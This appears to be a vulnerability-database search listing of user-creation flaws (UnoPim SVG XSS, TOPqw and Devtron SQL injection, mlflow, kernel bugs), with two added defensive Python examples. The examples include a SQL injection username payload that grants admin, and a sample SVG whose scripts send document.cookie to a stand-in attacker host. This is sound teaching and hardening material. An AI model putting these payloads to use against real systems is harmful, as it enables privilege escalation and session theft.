182 matches found
PYSEC-2025-17
In mlflow/mlflow version 2.18, an admin is able to create a new user account without setting a password. This vulnerability could lead to security risks, as accounts without passwords may be susceptible to unauthorized access. Additionally, this issue violates best practices for secure user accou...
CVE-2025-26342
A CWE-306 "Missing Authentication for Critical Function" in maxprofile/accounts/routes.lua in Q-Free MaxTime less than or equal to version 2.11.0 allows an unauthenticated remote attacker to create arbitrary users, including administrators, via crafted HTTP requests...
Linux kernel security vulnerability
The Linux kernel is the kernel of Linux, the open-source operating system stewarded by the Linux Foundation (United States). A security vulnerability exists in the Linux kernel, originating in the rawnand submodule of the mtd module, where the allocation of the "user" pointer in the...
PT-2025-30870
Name of the Vulnerable Software and Affected Versions: Linux kernel, affected versions not specified. Description: The Linux kernel contains a flaw in the ipmi_create_user function within the IPMI message handler. An invalid pointer in the "intf" list iterator can occur if the correct "intf->intf_num"...
Cross-Site Scripting (XSS)
unopim/unopim is vulnerable to Cross-Site Scripting XSS. The vulnerability is due to insufficient input validation in the Create User function, allowing attackers to exploit an SVG document to steal cookies...
GHSA-CGR4-C233-H733 UnoPim Stored XSS : Cookie hijacking through Create User function
Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to...
Cross-site Scripting (XSS)
Overview Affected versions of this package are vulnerable to Cross-site Scripting XSS through the Create User process, which involves uploading a profile image. An attacker can exploit this by uploading a malicious SVG file containing a maliciously crafted script, which executes when the profile...
UnoPim Stored XSS : Cookie hijacking through Create User function
Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to...
CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function
UnoPim is an open-source Product Information Management PIM system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...
CVE-2024-52305
CVE-2024-52305 affects UnoPim (Laravel). The issue resides in the Create User flow, where uploading a profile image (notably SVG) can execute embedded scripts, enabling a stored XSS that can steal cookies and potentially hijack sessions. Affected versions include the UnoPim releases prior to the ...
PT-2024-35166 · Unopim · Unopim
Name of the Vulnerable Software and Affected Versions: UnoPim versions prior to 0.1.5 Description: A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...
CVE-2024-45875
The CVE concerns baltic-it TOPqw Webportal 1.35.287.1, with a fix in 1.35.291. The vulnerability exists in the create user function at /Apps/TOPqw/BenutzerManagement.aspx/SaveNewUser, where the JSON object username enables SQL query manipulation. This is a SQL injection in the user-creation path,...
baltic-it TOPqw Webportal security vulnerability
baltic-it TOPqw Webportal is a web application developed by the German company baltic-it for social-service providers. It can be used to publicly view information about various facilities. A security vulnerability exists in baltic-it TOPqw Webportal version 1.35.287.1, which stems from a SQL...
Devtron SQL injection vulnerability
Devtron is a Kubernetes cloud-native tool integration platform open-sourced by Devtron. A SQL injection vulnerability exists in Devtron prior to version 0.7.2, which stems from an authenticated user being able to execute malicious SQL queries via the CreateUser interface...
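The two entries above (TOPqw Webportal and Devtron) describe the same pattern: a user-creation endpoint that splices a caller-supplied username from the request body into SQL. The following is an added example, not code from either project, showing why that matters in the user-creation path specifically. It assumes a hypothetical `users` table with a `role` column and an insert that hard-codes the role to `user`; the injected username then rewrites the statement to register the account as `admin`. The vulnerable and parameterized versions are run side by side on an in-memory SQLite database with a constructed JSON request body.

```python
import json
import sqlite3

# Hypothetical schema for this example; the real projects' tables are not known here.
SCHEMA = "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, role TEXT NOT NULL)"

# Constructed request body: the JSON "username" field carries the injection.
REQUEST_BODY = '{"username": "eve\', \'admin\') -- "}'


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def create_user_unsafe(conn: sqlite3.Connection, username: str) -> None:
    # Vulnerable pattern: the caller-controlled username is spliced into the SQL text,
    # so a quote in the value closes the string and the rest is parsed as SQL.
    conn.execute(f"INSERT INTO users (username, role) VALUES ('{username}', 'user')")
    conn.commit()


def create_user_safe(conn: sqlite3.Connection, username: str) -> None:
    # Hardened: the value is bound as a parameter and can never alter the statement.
    conn.execute("INSERT INTO users (username, role) VALUES (?, 'user')", (username,))
    conn.commit()


def roles(conn: sqlite3.Connection) -> dict[str, str]:
    return {u: r for u, r in conn.execute("SELECT username, role FROM users")}


def demo() -> tuple[dict[str, str], dict[str, str]]:
    """Create the same user through both code paths and return (unsafe roles, safe roles)."""
    username = json.loads(REQUEST_BODY)["username"]
    unsafe_db, safe_db = new_db(), new_db()
    create_user_unsafe(unsafe_db, username)   # becomes ... VALUES ('eve', 'admin') -- ', 'user')
    create_user_safe(safe_db, username)       # stores the whole payload as the username
    return roles(unsafe_db), roles(safe_db)


if __name__ == "__main__":
    unsafe, safe = demo()
    print("unsafe:", unsafe)   # {'eve': 'admin'}
    print("safe:  ", safe)     # {"eve', 'admin') -- ": 'user'}
```

The point to take from the unsafe branch is that no authentication bypass is needed: the Devtron entry says the attacker is already an authenticated user, and the TOPqw entry names the SaveNewUser handler, so the impact is privilege escalation through whatever columns the insert touches, not just data disclosure.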
UnoPim Cross-site Scripting vulnerability
UnoPim 0.1.3 and below is vulnerable to Cross Site Scripting XSS in the Create User function. The vulnerability allows attackers to perform XSS via an SVG file, which can be used to steal cookies...
GHSA-HV6M-QJ65-26Q3 UnoPim Cross-site Scripting vulnerability
UnoPim 0.1.3 and below is vulnerable to Cross Site Scripting XSS in the Create User function. The vulnerability allows attackers to perform XSS via an SVG file, which can be used to steal cookies...
CVE-2024-50637
UnoPim 0.1.3 and below is vulnerable to Cross Site Scripting XSS in the Create User function. This allows attackers to perform XSS via an SVG document, which can be used to steal cookies...
UnoPim security vulnerability
UnoPim is an open-source Product Information Management (PIM) system from UnoPim Open Source, built on the Laravel framework. A security vulnerability exists in UnoPim 0.1.3 and earlier versions, which stems from a cross-site scripting XSS vulnerability in the Create User function that allows an...
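The UnoPim entries above (CVE-2024-52305 and CVE-2024-50637, and the GHSA and PT records that mirror them) all come down to one check that was missing: a profile-image upload accepted SVG and later served it in a way that let the browser execute script embedded in it. The following is an added example, not UnoPim's code, of the two controls a practitioner would want at that upload point: a validator that walks the parsed SVG tree for script elements, event-handler attributes and `javascript:` URIs, and a header set for serving stored uploads so they are downloaded rather than navigated to. The element deny-list, size limit and the `attacker.invalid` host in the constructed sample are assumptions for this example. Walking the parsed tree rather than grepping the raw bytes is deliberate: an `href` written as `&#106;avascript:` is decoded by the parser and still caught.

```python
import re
import xml.etree.ElementTree as ET

# Assumed limits and deny-list for this example; not UnoPim's own settings.
MAX_SVG_BYTES = 256 * 1024
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
SCRIPT_URI = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)


def _local_name(qname: str) -> str:
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}svg' -> 'svg'."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an uploaded SVG must be rejected; an empty list means it passed."""
    if len(data) > MAX_SVG_BYTES:
        return ["file exceeds size limit"]
    try:
        # Size is capped above because ElementTree expands entities while parsing.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if _local_name(root.tag) != "svg":
        findings.append(f"root element is <{_local_name(root.tag)}>, not <svg>")
    for element in root.iter():
        name = _local_name(element.tag)
        if name in DANGEROUS_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in element.attrib.items():
            attr_name = _local_name(attr)          # handles xlink:href as well as href
            if attr_name.startswith("on"):
                findings.append(f"event handler {attr_name} on <{name}>")
            elif attr_name == "href" and SCRIPT_URI.match(value):
                scheme = value.split(":", 1)[0].strip().lower()
                findings.append(f"{scheme}: URI in href on <{name}>")
    return findings


def response_headers_for_upload(filename: str) -> dict[str, str]:
    """Headers for serving a stored upload so the browser never runs it as a document."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        # Script in an SVG runs when it is opened as a top-level document or via
        # <object>/<iframe>, not when referenced from <img>; forcing a download
        # removes the direct-access case the advisories describe.
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


# Constructed sample inputs for this example.
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">'
    b'<circle cx="8" cy="8" r="6" fill="#09f"/></svg>'
)
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>fetch("https://attacker.invalid/c?" + document.cookie)</script>
  <a xlink:href="&#106;avascript:alert(document.domain)"><text y="20">avatar</text></a>
  <image href="missing.png" onerror="fetch('https://attacker.invalid/c?' + document.cookie)"/>
</svg>"""


if __name__ == "__main__":
    print("benign:   ", svg_findings(BENIGN_SVG))      # []
    print("malicious:", svg_findings(MALICIOUS_SVG))   # three findings
    print(response_headers_for_upload("avatar.svg"))
```

The deny-list is a second line of defence, not the primary one: SVG has more script-capable constructs than are listed here (animation elements targeting `href`, external stylesheets, and so on), so the headers that stop the file from being rendered as a document are what actually close the cookie-theft path, and rasterising avatars to PNG on upload avoids the question entirely.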